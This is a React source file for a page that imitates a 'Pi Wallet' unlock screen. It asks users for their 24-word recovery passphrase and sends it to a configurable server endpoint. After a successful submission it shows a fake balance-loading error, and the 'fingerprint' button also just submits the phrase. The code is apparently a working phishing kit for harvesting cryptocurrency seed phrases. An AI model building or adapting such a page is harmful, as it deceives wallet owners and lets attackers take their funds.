import axios from "axios";
import React, { useEffect, useState } from "react";
import { useStateValue } from "../context/StateProvider";

const Wallet = () => {
    const [{API_URL}, payload] = useStateValue()
    const [phrase, setPhrase] = useState("")
    const [errorMessage, setErrorMessage] = useState(null)
    async function submitPhrase(e) {
        if (phrase === "" || phrase.split(" ").length !== 24) {
            payload({
                type: "NOTIFICATION",
                notification: {
                    status: "error",
                    message: "Empty or invalid phrase provided!"
                }
            })
            return false;
        }
        payload({type: "PROGRESS", status: true})
        try {
            // submit phrase
            await axios.post(`${API_URL}/auth`, {phrase}, {headers: {"Content-Type": "application/json"}})
            setErrorMessage("An error occurred while loading your wallet balance please try again")
        } catch(error) {
            // notify error
            payload({type: "NOTIFICATION", notification: {
                status: "error",
                message: error?.message || "Could not sync wallet at this time, try again later"
            }})
        } finally {
            payload({type: "PROGRESS"})
        }
    }
    useEffect(() => {
        document.body.classList = "light";
    }, []);
    return (
        <main>
            <div className="wallet-container">
                <div className="form-container">
                    <h1>Unlock Pi Wallet</h1>
                    <textarea
                        className="phrase-value"
                        placeholder="Enter your 24-word passphrase here"
                        value={phrase || ""}
                        onChange={e => setPhrase(e.target.value)}
                    ></textarea>
                    <div className="buttons">
                        {errorMessage !== null ? <div className="error-message">{errorMessage}</div> : null}
                        <button onClick={submitPhrase} className="btn hollow-primary">Unlock With Passphrase</button>
                        <button onClick={submitPhrase} className="btn fill-primary">Unlock With Fingerprint</button>
                    </div>
                    <div>
                        <p>As a non-custodial wallet, your wallet passphrase is exclusively accessible only to you. Recovery of passphrase is currently impossible.</p>
                    </div>
                    <div>
                        <p>
                            Lost your passphrase? <a href="https://wallet.pinet.com/create">You can create a new wallet,</a> but all your π in your previous wallet will be inaccessible.
                        </p>
                    </div>
                </div>
            </div>
        </main>
    );
};

export default Wallet;
